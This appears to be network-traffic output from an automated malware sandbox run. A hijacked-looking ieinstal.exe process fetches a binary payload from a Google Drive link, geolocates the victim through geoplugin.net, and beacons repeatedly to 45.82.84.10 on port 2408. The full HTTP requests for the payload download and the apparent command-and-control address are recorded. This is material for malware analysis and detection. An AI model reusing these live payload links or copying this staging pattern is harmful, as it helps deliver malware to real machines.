                                                                                    Apr 26, 2023 16:44:26.963963032 CEST49797443192.168.11.20142.250.185.129
                                                                                    Apr 26, 2023 16:44:26.963970900 CEST44349797142.250.185.129192.168.11.20
                                                                                    Apr 26, 2023 16:44:26.964080095 CEST49797443192.168.11.20142.250.185.129
                                                                                    Apr 26, 2023 16:44:26.964106083 CEST44349797142.250.185.129192.168.11.20
                                                                                    Apr 26, 2023 16:44:26.964129925 CEST49797443192.168.11.20142.250.185.129
                                                                                    Apr 26, 2023 16:44:26.964143038 CEST44349797142.250.185.129192.168.11.20
                                                                                    Apr 26, 2023 16:44:26.964281082 CEST44349797142.250.185.129192.168.11.20
                                                                                    Apr 26, 2023 16:44:26.964297056 CEST49797443192.168.11.20142.250.185.129
                                                                                    Apr 26, 2023 16:44:26.964304924 CEST44349797142.250.185.129192.168.11.20
                                                                                    Apr 26, 2023 16:44:26.964432955 CEST49797443192.168.11.20142.250.185.129
                                                                                    Apr 26, 2023 16:44:26.964432955 CEST49797443192.168.11.20142.250.185.129
                                                                                    Apr 26, 2023 16:44:26.964446068 CEST44349797142.250.185.129192.168.11.20
                                                                                    Apr 26, 2023 16:44:26.964452028 CEST44349797142.250.185.129192.168.11.20
                                                                                    Apr 26, 2023 16:44:26.964642048 CEST44349797142.250.185.129192.168.11.20
                                                                                    Apr 26, 2023 16:44:26.964675903 CEST49797443192.168.11.20142.250.185.129
                                                                                    Apr 26, 2023 16:44:26.964684963 CEST44349797142.250.185.129192.168.11.20
                                                                                    Apr 26, 2023 16:44:26.964773893 CEST49797443192.168.11.20142.250.185.129
                                                                                    Apr 26, 2023 16:44:26.964773893 CEST49797443192.168.11.20142.250.185.129
                                                                                    Apr 26, 2023 16:44:26.964822054 CEST49797443192.168.11.20142.250.185.129
                                                                                    Apr 26, 2023 16:44:26.964855909 CEST44349797142.250.185.129192.168.11.20
                                                                                    Apr 26, 2023 16:44:26.964870930 CEST49797443192.168.11.20142.250.185.129
                                                                                    Apr 26, 2023 16:44:26.964879036 CEST44349797142.250.185.129192.168.11.20
                                                                                    Apr 26, 2023 16:44:26.964987993 CEST44349797142.250.185.129192.168.11.20
                                                                                    Apr 26, 2023 16:44:26.965008020 CEST49797443192.168.11.20142.250.185.129
                                                                                    Apr 26, 2023 16:44:26.965008020 CEST49797443192.168.11.20142.250.185.129
                                                                                    Apr 26, 2023 16:44:26.965024948 CEST44349797142.250.185.129192.168.11.20
                                                                                    Apr 26, 2023 16:44:26.965125084 CEST49797443192.168.11.20142.250.185.129
                                                                                    Apr 26, 2023 16:44:26.965125084 CEST49797443192.168.11.20142.250.185.129
                                                                                    Apr 26, 2023 16:44:26.965151072 CEST44349797142.250.185.129192.168.11.20
                                                                                    Apr 26, 2023 16:44:26.965210915 CEST44349797142.250.185.129192.168.11.20
                                                                                    Apr 26, 2023 16:44:26.965295076 CEST49797443192.168.11.20142.250.185.129
                                                                                    Apr 26, 2023 16:44:26.965296984 CEST44349797142.250.185.129192.168.11.20
                                                                                    Apr 26, 2023 16:44:26.965306997 CEST44349797142.250.185.129192.168.11.20
                                                                                    Apr 26, 2023 16:44:26.965343952 CEST49797443192.168.11.20142.250.185.129
                                                                                    Apr 26, 2023 16:44:26.965399027 CEST44349797142.250.185.129192.168.11.20
                                                                                    Apr 26, 2023 16:44:26.965421915 CEST49797443192.168.11.20142.250.185.129
                                                                                    Apr 26, 2023 16:44:26.965456009 CEST44349797142.250.185.129192.168.11.20
                                                                                    Apr 26, 2023 16:44:26.965470076 CEST49797443192.168.11.20142.250.185.129
                                                                                    Apr 26, 2023 16:44:26.965470076 CEST49797443192.168.11.20142.250.185.129
                                                                                    Apr 26, 2023 16:44:26.965478897 CEST44349797142.250.185.129192.168.11.20
                                                                                    Apr 26, 2023 16:44:26.965559006 CEST44349797142.250.185.129192.168.11.20
                                                                                    Apr 26, 2023 16:44:26.965567112 CEST49797443192.168.11.20142.250.185.129
                                                                                    Apr 26, 2023 16:44:26.965616941 CEST49797443192.168.11.20142.250.185.129
                                                                                    Apr 26, 2023 16:44:26.965616941 CEST49797443192.168.11.20142.250.185.129
                                                                                    Apr 26, 2023 16:44:26.965626955 CEST44349797142.250.185.129192.168.11.20
                                                                                    Apr 26, 2023 16:44:26.965631962 CEST44349797142.250.185.129192.168.11.20
                                                                                    Apr 26, 2023 16:44:26.965714931 CEST49797443192.168.11.20142.250.185.129
                                                                                    Apr 26, 2023 16:44:26.965738058 CEST44349797142.250.185.129192.168.11.20
                                                                                    Apr 26, 2023 16:44:26.965780973 CEST49797443192.168.11.20142.250.185.129
                                                                                    Apr 26, 2023 16:44:26.965780973 CEST49797443192.168.11.20142.250.185.129
                                                                                    Apr 26, 2023 16:44:26.965792894 CEST44349797142.250.185.129192.168.11.20
                                                                                    Apr 26, 2023 16:44:26.965846062 CEST44349797142.250.185.129192.168.11.20
                                                                                    Apr 26, 2023 16:44:26.965898037 CEST49797443192.168.11.20142.250.185.129
                                                                                    Apr 26, 2023 16:44:26.965946913 CEST49797443192.168.11.20142.250.185.129
                                                                                    Apr 26, 2023 16:44:26.965956926 CEST44349797142.250.185.129192.168.11.20
                                                                                    Apr 26, 2023 16:44:26.965996981 CEST49797443192.168.11.20142.250.185.129
                                                                                    Apr 26, 2023 16:44:26.966012001 CEST44349797142.250.185.129192.168.11.20
                                                                                    Apr 26, 2023 16:44:26.966123104 CEST49797443192.168.11.20142.250.185.129
                                                                                    Apr 26, 2023 16:44:26.968211889 CEST49797443192.168.11.20142.250.185.129
                                                                                    Apr 26, 2023 16:44:26.968225956 CEST44349797142.250.185.129192.168.11.20
                                                                                    Apr 26, 2023 16:44:27.131629944 CEST497992408192.168.11.2045.82.84.10
                                                                                    Apr 26, 2023 16:44:27.289405107 CEST24084979945.82.84.10192.168.11.20
                                                                                    Apr 26, 2023 16:44:27.289881945 CEST497992408192.168.11.2045.82.84.10
                                                                                    Apr 26, 2023 16:44:27.293551922 CEST497992408192.168.11.2045.82.84.10
                                                                                    Apr 26, 2023 16:44:27.454459906 CEST24084979945.82.84.10192.168.11.20
                                                                                    Apr 26, 2023 16:44:27.498843908 CEST497992408192.168.11.2045.82.84.10
                                                                                    Apr 26, 2023 16:44:27.656675100 CEST24084979945.82.84.10192.168.11.20
                                                                                    Apr 26, 2023 16:44:27.664207935 CEST497992408192.168.11.2045.82.84.10
                                                                                    Apr 26, 2023 16:44:27.874619961 CEST24084979945.82.84.10192.168.11.20
                                                                                    Apr 26, 2023 16:44:27.875005960 CEST497992408192.168.11.2045.82.84.10
                                                                                    Apr 26, 2023 16:44:28.075423002 CEST24084979945.82.84.10192.168.11.20
                                                                                    Apr 26, 2023 16:44:28.122838020 CEST24084979945.82.84.10192.168.11.20
                                                                                    Apr 26, 2023 16:44:28.124222994 CEST497992408192.168.11.2045.82.84.10
                                                                                    Apr 26, 2023 16:44:28.282483101 CEST24084979945.82.84.10192.168.11.20
                                                                                    Apr 26, 2023 16:44:28.297209978 CEST4980080192.168.11.20178.237.33.50
                                                                                    Apr 26, 2023 16:44:28.314333916 CEST8049800178.237.33.50192.168.11.20
                                                                                    Apr 26, 2023 16:44:28.314549923 CEST4980080192.168.11.20178.237.33.50
                                                                                    Apr 26, 2023 16:44:28.314737082 CEST4980080192.168.11.20178.237.33.50
                                                                                    Apr 26, 2023 16:44:28.327454090 CEST497992408192.168.11.2045.82.84.10
                                                                                    Apr 26, 2023 16:44:28.335777998 CEST8049800178.237.33.50192.168.11.20
                                                                                    Apr 26, 2023 16:44:28.335982084 CEST4980080192.168.11.20178.237.33.50
                                                                                    Apr 26, 2023 16:44:28.385921955 CEST497992408192.168.11.2045.82.84.10
                                                                                    Apr 26, 2023 16:44:28.592432976 CEST24084979945.82.84.10192.168.11.20
                                                                                    Apr 26, 2023 16:44:29.256959915 CEST24084979945.82.84.10192.168.11.20
                                                                                    Apr 26, 2023 16:44:29.258522034 CEST497992408192.168.11.2045.82.84.10
                                                                                    Apr 26, 2023 16:44:29.337703943 CEST8049800178.237.33.50192.168.11.20
                                                                                    Apr 26, 2023 16:44:29.337989092 CEST4980080192.168.11.20178.237.33.50
                                                                                    Apr 26, 2023 16:44:29.456649065 CEST24084979945.82.84.10192.168.11.20
                                                                                    Apr 26, 2023 16:44:59.267328978 CEST24084979945.82.84.10192.168.11.20
                                                                                    Apr 26, 2023 16:44:59.268284082 CEST497992408192.168.11.2045.82.84.10
                                                                                    Apr 26, 2023 16:44:59.467928886 CEST24084979945.82.84.10192.168.11.20
                                                                                    Apr 26, 2023 16:45:29.281023026 CEST24084979945.82.84.10192.168.11.20
                                                                                    Apr 26, 2023 16:45:29.282278061 CEST497992408192.168.11.2045.82.84.10
                                                                                    Apr 26, 2023 16:45:29.502592087 CEST24084979945.82.84.10192.168.11.20
                                                                                    Apr 26, 2023 16:45:59.293967962 CEST24084979945.82.84.10192.168.11.20
                                                                                    Apr 26, 2023 16:45:59.295455933 CEST497992408192.168.11.2045.82.84.10
                                                                                    Apr 26, 2023 16:45:59.493362904 CEST24084979945.82.84.10192.168.11.20
                                                                                    Apr 26, 2023 16:46:15.756342888 CEST4980080192.168.11.20178.237.33.50
                                                                                    Apr 26, 2023 16:46:16.068649054 CEST4980080192.168.11.20178.237.33.50
                                                                                    Apr 26, 2023 16:46:16.677906990 CEST4980080192.168.11.20178.237.33.50
                                                                                    Apr 26, 2023 16:46:17.880779028 CEST4980080192.168.11.20178.237.33.50
                                                                                    Apr 26, 2023 16:46:20.286475897 CEST4980080192.168.11.20178.237.33.50
                                                                                    Apr 26, 2023 16:46:25.098016024 CEST4980080192.168.11.20178.237.33.50
                                                                                    Apr 26, 2023 16:46:29.295279026 CEST24084979945.82.84.10192.168.11.20
                                                                                    Apr 26, 2023 16:46:29.296281099 CEST497992408192.168.11.2045.82.84.10
                                                                                    Apr 26, 2023 16:46:29.495596886 CEST24084979945.82.84.10192.168.11.20
                                                                                    Apr 26, 2023 16:46:34.705246925 CEST4980080192.168.11.20178.237.33.50
                                                                                    Apr 26, 2023 16:46:59.296734095 CEST24084979945.82.84.10192.168.11.20
                                                                                    Apr 26, 2023 16:46:59.297899961 CEST497992408192.168.11.2045.82.84.10
                                                                                    Apr 26, 2023 16:46:59.496390104 CEST24084979945.82.84.10192.168.11.20
                                                                                    Apr 26, 2023 16:47:29.310141087 CEST24084979945.82.84.10192.168.11.20
                                                                                    Apr 26, 2023 16:47:29.311186075 CEST497992408192.168.11.2045.82.84.10
                                                                                    Apr 26, 2023 16:47:29.509524107 CEST24084979945.82.84.10192.168.11.20
                                                                                    Apr 26, 2023 16:47:59.315638065 CEST24084979945.82.84.10192.168.11.20
                                                                                    Apr 26, 2023 16:47:59.316894054 CEST497992408192.168.11.2045.82.84.10
                                                                                    Apr 26, 2023 16:47:59.515805960 CEST24084979945.82.84.10192.168.11.20
                                                                                    Apr 26, 2023 16:48:29.330540895 CEST24084979945.82.84.10192.168.11.20
                                                                                    Apr 26, 2023 16:48:29.331504107 CEST497992408192.168.11.2045.82.84.10
                                                                                    Apr 26, 2023 16:48:29.529942989 CEST24084979945.82.84.10192.168.11.20
                                                                                    Apr 26, 2023 16:48:59.338574886 CEST24084979945.82.84.10192.168.11.20
                                                                                    Apr 26, 2023 16:48:59.341542959 CEST497992408192.168.11.2045.82.84.10
                                                                                    Apr 26, 2023 16:48:59.554378986 CEST24084979945.82.84.10192.168.11.20
                                                                                    Apr 26, 2023 16:49:29.350526094 CEST24084979945.82.84.10192.168.11.20
                                                                                    Apr 26, 2023 16:49:29.351809025 CEST497992408192.168.11.2045.82.84.10
                                                                                    Apr 26, 2023 16:49:29.550477028 CEST24084979945.82.84.10192.168.11.20
                                                                                    Apr 26, 2023 16:49:59.359653950 CEST24084979945.82.84.10192.168.11.20
                                                                                    Apr 26, 2023 16:49:59.360711098 CEST497992408192.168.11.2045.82.84.10
                                                                                    Apr 26, 2023 16:49:59.558713913 CEST24084979945.82.84.10192.168.11.20
                                                                                    Apr 26, 2023 16:50:29.380270958 CEST24084979945.82.84.10192.168.11.20
                                                                                    Apr 26, 2023 16:50:29.381392956 CEST497992408192.168.11.2045.82.84.10
                                                                                    Apr 26, 2023 16:50:29.579657078 CEST24084979945.82.84.10192.168.11.20
                                                                                    Apr 26, 2023 16:50:59.393918037 CEST24084979945.82.84.10192.168.11.20
                                                                                    Apr 26, 2023 16:50:59.395478010 CEST497992408192.168.11.2045.82.84.10
                                                                                    Apr 26, 2023 16:50:59.594620943 CEST24084979945.82.84.10192.168.11.20
                                                                                    Apr 26, 2023 16:51:29.407650948 CEST24084979945.82.84.10192.168.11.20
                                                                                    Apr 26, 2023 16:51:29.409529924 CEST497992408192.168.11.2045.82.84.10
                                                                                    Apr 26, 2023 16:51:29.623106003 CEST24084979945.82.84.10192.168.11.20
                                                                                    Apr 26, 2023 16:51:59.412920952 CEST24084979945.82.84.10192.168.11.20
                                                                                    Apr 26, 2023 16:51:59.414395094 CEST497992408192.168.11.2045.82.84.10
                                                                                    Apr 26, 2023 16:51:59.613127947 CEST24084979945.82.84.10192.168.11.20
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Apr 26, 2023 16:44:25.841288090 CEST5098753192.168.11.201.1.1.1
                                                                                    Apr 26, 2023 16:44:25.851357937 CEST53509871.1.1.1192.168.11.20
                                                                                    Apr 26, 2023 16:44:26.538652897 CEST6398753192.168.11.201.1.1.1
                                                                                    Apr 26, 2023 16:44:26.571249008 CEST53639871.1.1.1192.168.11.20
                                                                                    Apr 26, 2023 16:44:28.286221027 CEST5237853192.168.11.201.1.1.1
                                                                                    Apr 26, 2023 16:44:28.296253920 CEST53523781.1.1.1192.168.11.20
                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Apr 26, 2023 16:44:25.841288090 CEST192.168.11.201.1.1.10xd2eeStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                    Apr 26, 2023 16:44:26.538652897 CEST192.168.11.201.1.1.10x936dStandard query (0)doc-0c-18-docs.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                    Apr 26, 2023 16:44:28.286221027 CEST192.168.11.201.1.1.10xaf63Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Apr 26, 2023 16:44:25.851357937 CEST1.1.1.1192.168.11.200xd2eeNo error (0)drive.google.com142.250.186.174A (IP address)IN (0x0001)false
                                                                                    Apr 26, 2023 16:44:26.571249008 CEST1.1.1.1192.168.11.200x936dNo error (0)doc-0c-18-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                    Apr 26, 2023 16:44:26.571249008 CEST1.1.1.1192.168.11.200x936dNo error (0)googlehosted.l.googleusercontent.com142.250.185.129A (IP address)IN (0x0001)false
                                                                                    Apr 26, 2023 16:44:28.296253920 CEST1.1.1.1192.168.11.200xaf63No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                    • drive.google.com
                                                                                    • doc-0c-18-docs.googleusercontent.com
                                                                                    • geoplugin.net
                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    0192.168.11.2049796142.250.186.174443C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                                                                                    TimestampkBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    1192.168.11.2049797142.250.185.129443C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                                                                                    TimestampkBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    2192.168.11.2049800178.237.33.5080C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    Apr 26, 2023 16:44:28.314737082 CEST719OUTGET /json.gp HTTP/1.1
                                                                                    Host: geoplugin.net
                                                                                    Cache-Control: no-cache
                                                                                    Apr 26, 2023 16:44:28.335777998 CEST720INHTTP/1.1 200 OK
                                                                                    date: Wed, 26 Apr 2023 16:17:06 GMT
                                                                                    server: Apache
                                                                                    content-length: 943
                                                                                    content-type: application/json; charset=utf-8
                                                                                    cache-control: public, max-age=300
                                                                                    access-control-allow-origin: *
                                                                                    Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 5a 75 67 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 6f 64 65 22 3a 22 5a 47 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 67 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 61 72 65 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 6d 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 69 6e 45 55 22 3a 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 65 75 56 41 54 72 61 74 65 22 3a 66 61 6c 73 65 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 45 55 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 45 75 72 6f 70 65 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 61 74 69 74 75 64 65 22 3a 22 34 37 2e 31 37 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 6e 67 69 74 75 64 65 22 3a 22 38 2e 34 32 30 34 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 63 61 74 69 6f 6e 41 63 63 75 72 61 63 79 52 61 64 69 75 73 22 3a 22 32 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 5c 2f 5a 75 72 69 63 68 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 43 48 46 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 22 3a 22 43 48 46 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 5f 55 54 46 38 22 3a 22 43 48 46 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 6e 76 65 72 74 65 72 22 3a 30 2e 38 38 37 33 0a 7d
                                                                                    Data Ascii: { "geoplugin_request":"102.129.143.5", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite data created by MaxMind, available from <a href='http:\/\/www.maxmind.com'>http:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Hunenberg", "geoplugin_region":"Zug", "geoplugin_regionCode":"ZG", "geoplugin_regionName":"Zug", "geoplugin_areaCode":"", "geoplugin_dmaCode":"", "geoplugin_countryCode":"CH", "geoplugin_countryName":"Switzerland", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"EU", "geoplugin_continentName":"Europe", "geoplugin_latitude":"47.173", "geoplugin_longitude":"8.4204", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"Europe\/Zurich", "geoplugin_currencyCode":"CHF", "geoplugin_currencySymbol":"CHF", "geoplugin_currencySymbol_UTF8":"CHF", "geoplugin_currencyConverter":0.8873}


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    0192.168.11.2049796142.250.186.174443C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2023-04-26 14:44:26 UTC0OUTGET /uc?export=download&id=1KTmOxGhXIq2ElcP80VIZKg-V2XXDylRv HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Host: drive.google.com
                                                                                    Cache-Control: no-cache
                                                                                    2023-04-26 14:44:26 UTC0INHTTP/1.1 303 See Other
                                                                                    Content-Type: application/binary
                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                    Date: Wed, 26 Apr 2023 14:44:26 GMT
                                                                                    Location: https://doc-0c-18-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/u240eld0p0tadod6hiuj3dfkeglaump9/1682520225000/10652726447177276017/*/1KTmOxGhXIq2ElcP80VIZKg-V2XXDylRv?e=download&uuid=ced9cc8a-b62a-40b4-be8c-f2049575c42e
                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                    Content-Security-Policy: script-src 'nonce-1PiLDa4MitRXH8S9K0xT6Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                    Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                    Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                    Server: ESF
                                                                                    Content-Length: 0
                                                                                    X-XSS-Protection: 0
                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                    Connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    1192.168.11.2049797142.250.185.129443C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2023-04-26 14:44:26 UTC1OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/u240eld0p0tadod6hiuj3dfkeglaump9/1682520225000/10652726447177276017/*/1KTmOxGhXIq2ElcP80VIZKg-V2XXDylRv?e=download&uuid=ced9cc8a-b62a-40b4-be8c-f2049575c42e HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Cache-Control: no-cache
                                                                                    Host: doc-0c-18-docs.googleusercontent.com
                                                                                    Connection: Keep-Alive
                                                                                    2023-04-26 14:44:26 UTC2INHTTP/1.1 200 OK
                                                                                    X-GUploader-UploadID: ADPycduV7O34hkXtVd5ZgPnqjQ3v9crnK1CQ0m5ZSs4GVQRcrQF8-RSqZd3252VVnaBmq2LXmjxXxT0qW9qu9IillxZKWQ
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Disposition: attachment; filename="pNPiBoVYXKKJ183.bin"; filename*=UTF-8''pNPiBoVYXKKJ183.bin
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Credentials: false
                                                                                    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-328800237-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token
                                                                                    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                    Content-Length: 488000
                                                                                    Date: Wed, 26 Apr 2023 14:44:26 GMT
                                                                                    Expires: Wed, 26 Apr 2023 14:44:26 GMT
                                                                                    Cache-Control: private, max-age=0
                                                                                    X-Goog-Hash: crc32c=br/5ew==
                                                                                    Server: UploadServer
